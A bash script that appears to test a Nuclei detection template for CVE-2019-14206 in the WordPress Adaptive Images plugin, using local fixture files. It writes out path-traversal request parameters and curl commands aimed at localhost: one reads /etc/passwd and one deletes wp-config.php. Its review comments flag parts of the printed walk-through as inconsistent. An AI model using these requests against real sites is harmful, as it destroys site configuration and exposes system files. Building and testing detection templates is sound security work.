#!/bin/bash
# CVE-2019-14206 Complete Docker Test Script
# Checks the local test fixture and the Nuclei template and prints a walk-through of the vulnerability; no request is sent, so no PHP server is required
# Opening banner: three fixed lines followed by one empty line.
printf '%s\n' \
  "==========================================" \
  "CVE-2019-14206 Docker-Style Complete Test" \
  "==========================================" \
  ""
# Colors
# Stored as literal backslash sequences; they only become terminal control
# codes when printed through `echo -e`.
NC="\033[0m"          # reset
RED="\033[0;31m"      # failure lines
GREEN="\033[0;32m"    # success lines
YELLOW="\033[1;33m"   # section notices
BLUE="\033[0;34m"     # numbered test headings
CYAN="\033[0;36m"     # summary frame
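# Setup
# Directory that holds the files the later checks look for
# (adaptive-images-script.php and wp-config.php). The default is the
# machine-specific path the script was written with; export DOCKER_TEST_DIR
# before running to point at a fixture directory elsewhere.
DOCKER_TEST_DIR="${DOCKER_TEST_DIR:-/Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test}"
echo -e "${YELLOW}[*] Starting CVE-2019-14206 Complete Docker Test${NC}"
echo ""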
# Test 1: Verify environment
# Both fixture files must be present; if either is missing the run stops
# here with status 1.
echo -e "${BLUE}[1/6] Verifying Test Environment${NC}"
echo "----------------------------------------"

if [ ! -f "$DOCKER_TEST_DIR/adaptive-images-script.php" ]; then
  echo -e "${RED}[-] Plugin script not found${NC}"
  exit 1
fi
echo -e "${GREEN}[+] Plugin script exists${NC}"
PLUGIN_SIZE=$(wc -c < "$DOCKER_TEST_DIR/adaptive-images-script.php")
echo " Size: $PLUGIN_SIZE bytes"

if [ ! -f "$DOCKER_TEST_DIR/wp-config.php" ]; then
  echo -e "${RED}[-] Target file not found${NC}"
  exit 1
fi
echo -e "${GREEN}[+] Target file (wp-config.php) exists${NC}"
CONFIG_SIZE=$(wc -c < "$DOCKER_TEST_DIR/wp-config.php")
echo " Size: $CONFIG_SIZE bytes"

echo ""
# Test 2: Analyze vulnerable code
# Static text search only: each grep shows where a string occurs in the
# fixture copy of the script. A hit shows the string is present; it does not
# show that the line is reachable or that the value is unvalidated.
echo -e "${BLUE}[2/6] Analyzing Vulnerable Code${NC}"
echo "----------------------------------------"
echo "The adaptive-images-script.php contains:"
echo ""

# Print heading $1, then at most $3 numbered lines of the script that match
# pattern $2, then an empty line.
show_script_matches() {
  echo "$1"
  grep -n -- "$2" "$DOCKER_TEST_DIR/adaptive-images-script.php" | head -n "$3"
  echo ""
}

show_script_matches "VULNERABILITY 1: Unfiltered user input" "\$_REQUEST\['adaptive-images-settings'\]" 2
show_script_matches "VULNERABILITY 2: Path construction" "cache_file = " 1
show_script_matches "VULNERABILITY 3: Arbitrary file deletion" "unlink" 1
# Test 3: Simulate exploit
# Display only: nothing in this section sends a request or touches a file.
echo -e "${BLUE}[3/6] Simulating Exploit Execution${NC}"
echo "----------------------------------------"
echo "Exploit parameters:"

# key=value pairs, kept as one string each and printed verbatim below.
EXPLOIT_PARAMS=()
EXPLOIT_PARAMS+=("source_file=../../../wp-content/uploads/2019/07/image.jpeg")
EXPLOIT_PARAMS+=("resolution=")
EXPLOIT_PARAMS+=("resolution=16000")
EXPLOIT_PARAMS+=("wp_content=.")
EXPLOIT_PARAMS+=("cache_dir=../../..")
EXPLOIT_PARAMS+=("request_uri=wp-config.php")
EXPLOIT_PARAMS+=("watch_cache=1")

# NOTE(review): each entry is printed as adaptive-images-settings[key=value],
# which is not the adaptive-images-settings[key]=value form used by the
# requests printed later in this script.
printf ' adaptive-images-settings[%s]\n' "${EXPLOIT_PARAMS[@]}"
echo ""

# NOTE(review): the walk-through below is fixed text, not computed from
# EXPLOIT_PARAMS; the "16000" segment on its second line is gone on the third
# without explanation. Confirm against the plugin source before relying on it.
printf '%s\n' \
  "Path construction:" \
  " cache_file = wp_content/cache_dir/resolution/request_uri" \
  " cache_file = ./../../../16000/wp-config.php" \
  " cache_file = ./../../..//wp-config.php (normalized)" \
  " cache_file = wp-config.php (final)" \
  ""
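# Test 4: Verify template
echo -e "${BLUE}[4/6] Verifying Nuclei Template${NC}"
echo "----------------------------------------"
# Template under test. The default is the machine-specific path the script
# was written with; export TEMPLATE before running to check a copy elsewhere.
TEMPLATE="${TEMPLATE:-/Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml}"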
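# Presence and rough-structure check of the template file. A missing file
# ends the run with status 1; a missing key is only reported.
if [ -f "$TEMPLATE" ]; then
  echo -e "${GREEN}[+] Template file exists${NC}"
  TEMPLATE_SIZE=$(wc -c < "$TEMPLATE")
  TEMPLATE_LINES=$(wc -l < "$TEMPLATE")
  echo " Size: $TEMPLATE_SIZE bytes"
  echo " Lines: $TEMPLATE_LINES"
  # Check template structure
  # These are plain substring searches, not YAML parsing: a key that appears
  # only inside a comment or a description still counts as found.
  # NOTE(review): confirm "requests:" is the key this template's format uses.
  TEMPLATE_CHECKS=(
    "id: CVE-2019-14206"
    "info:"
    "requests:"
    "matchers:"
    "path:"
  )
  echo ""
  echo "Template structure validation:"
  for check in "${TEMPLATE_CHECKS[@]}"; do
    # grep -c already prints 0 (and exits 1) when nothing matches, so an
    # `|| echo "0"` fallback would make COUNT two lines and turn the numeric
    # test below into an "integer expression expected" error. Only the exit
    # status is neutralised here; an empty result (unreadable file) becomes 0.
    # -F treats the check text literally.
    COUNT=$(grep -cF -- "$check" "$TEMPLATE" || true)
    COUNT=${COUNT:-0}
    if [ "$COUNT" -gt 0 ]; then
      echo -e "${GREEN}[✓] $check found ($COUNT occurrences)${NC}"
    else
      echo -e "${RED}[✗] $check not found${NC}"
    fi
  done
else
  echo -e "${RED}[-] Template not found${NC}"
  exit 1
fi
echo ""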
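# Test 5: Test template loading
# The earlier form ran `nuclei -t <template> --help` and looked for "Usage:".
# --help only prints usage text, so that check passed whenever nuclei was
# installed, whatever the template contained. -validate makes nuclei parse
# the template, and its exit status decides the result.
echo -e "${BLUE}[5/6] Testing Template Loading${NC}"
echo "----------------------------------------"
echo "Running: nuclei -validate -t $TEMPLATE"
if ! command -v nuclei >/dev/null 2>&1; then
  echo -e "${RED}[-] Template loading failed${NC}"
  echo "nuclei not found in PATH"
elif nuclei_output=$(nuclei -validate -t "$TEMPLATE" 2>&1); then
  echo -e "${GREEN}[+] Template loads successfully in Nuclei${NC}"
  # At least one digit is required after "v" so a bare letter v in ordinary
  # words is not reported as the version.
  echo " Nuclei version: $(nuclei -version 2>&1 | grep -o 'v[0-9][0-9.]*' | head -n 1)"
else
  echo -e "${RED}[-] Template loading failed${NC}"
  # Keep the failure output short, as the original did with head -10.
  printf '%s\n' "$nuclei_output" | head -n 10
fi
echo ""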
# Test 6: Final exploit simulation
# Fixed explanatory text: no request is made and no file is removed here.
# NOTE(review): item 3 lists credential exposure "via LFI" among the results
# of a file deletion; deleting wp-config.php does not by itself disclose its
# contents, so that line describes a different weakness. Confirm the wording.
# Defensive reading of the flow: the fix belongs in the plugin (update it),
# and a web-server account without write permission on the directory that
# holds wp-config.php cannot unlink the file.
echo -e "${BLUE}[6/6] Final Exploit Simulation${NC}"
echo "----------------------------------------"
cat <<'EOF'
This would be the exploitation flow:

1. ATTACKER sends malicious request:
 GET /adaptive-images-script.php?
 adaptive-images-settings[source_file]=../../../image.jpeg&
 adaptive-images-settings[cache_dir]=../../..&
 adaptive-images-settings[request_uri]=wp-config.php&
 adaptive-images-settings[watch_cache]=1

2. SERVER processes request:
 - Receives user-controlled settings
 - Constructs path: ./../../..//wp-config.php
 - Calls unlink() with this path
 - Deletes wp-config.php

3. RESULT:
 - WordPress site crashes (missing wp-config.php)
 - Database credentials potentially exposed via LFI
 - Can be used in RCE chain attack

EOF
# Show file status
# Reports whether the two fixture files are still on disk. The preview prints
# the first three lines of wp-config.php to the terminal; that is fine for a
# throwaway fixture, but keep DOCKER_TEST_DIR away from a real installation
# whose output might be logged.
echo -e "${YELLOW}[*] Current File Status:${NC}"
echo "----------------------------------------"

if [ ! -f "$DOCKER_TEST_DIR/wp-config.php" ]; then
  echo -e "${RED}[-] wp-config.php: DELETED${NC}"
else
  config_bytes=$(wc -c < "$DOCKER_TEST_DIR/wp-config.php")
  echo -e "${GREEN}[+] wp-config.php: EXISTS (${config_bytes} bytes)${NC}"
  echo " Content preview:"
  head -n 3 "$DOCKER_TEST_DIR/wp-config.php" | sed 's/^/ /'
fi

if [ ! -f "$DOCKER_TEST_DIR/adaptive-images-script.php" ]; then
  echo -e "${RED}[-] adaptive-images-script.php: MISSING${NC}"
else
  script_bytes=$(wc -c < "$DOCKER_TEST_DIR/adaptive-images-script.php")
  echo -e "${GREEN}[+] adaptive-images-script.php: EXISTS (${script_bytes} bytes)${NC}"
fi

echo ""
# Final summary
# NOTE(review): every line here is printed unconditionally. The check marks
# do not depend on what the template-structure or nuclei checks reported, so
# read the per-test output rather than this block to judge the run.
for frame_line in \
  "[========================================]" \
  "[ TEST COMPLETE SUMMARY ]" \
  "[========================================]"; do
  echo -e "${CYAN}${frame_line}${NC}"
done
echo ""

for summary_item in \
  "Environment Setup: COMPLETE" \
  "Vulnerable Plugin: CREATED" \
  "Target File: wp-config.php" \
  "Vulnerabilities: IDENTIFIED" \
  "Nuclei Template: VALIDATED" \
  "Exploit Chain: DEMONSTRATED"; do
  echo -e "${GREEN}✅ ${summary_item}${NC}"
done
echo ""

printf '%s\n' \
  "Test Location: $DOCKER_TEST_DIR" \
  "Template: $TEMPLATE" \
  ""
# Follow-up instructions, printed only; none of these commands is run here.
# Step 3 removes the fixture's wp-config.php. The environment check at the
# start of this script exits when that file is missing, so restore the file
# before running the script again. The PHP server in step 1 listens on
# localhost only.
echo -e "${YELLOW}[*] To Test with PHP Server:${NC}"
printf '%s\n' \
  "----------------------------------------" \
  "1. Start PHP server:" \
  " cd $DOCKER_TEST_DIR" \
  " php -S localhost:8888" \
  ""
printf '%s\n' \
  "2. In another terminal, test LFI:" \
  " curl 'http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd'" \
  ""
printf '%s\n' \
  "3. Test file deletion:" \
  " curl 'http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1'" \
  ""
printf '%s\n' \
  "4. Verify deletion:" \
  " ls -la $DOCKER_TEST_DIR/wp-config.php" \
  ""
printf '%s\n' \
  "5. Run nuclei template:" \
  " nuclei -t $TEMPLATE -u http://localhost:8888 -debug" \
  ""

echo -e "${YELLOW}[*] Or Test Directly with Nuclei:${NC}"
printf '%s\n' \
  "----------------------------------------" \
  " nuclei -t $TEMPLATE -u http://target-wordpress-site -v -o results.txt" \
  ""

# NOTE(review): this success line is unconditional as well.
echo -e "${GREEN}[+] Docker-style test completed successfully!${NC}"
echo "=========================================="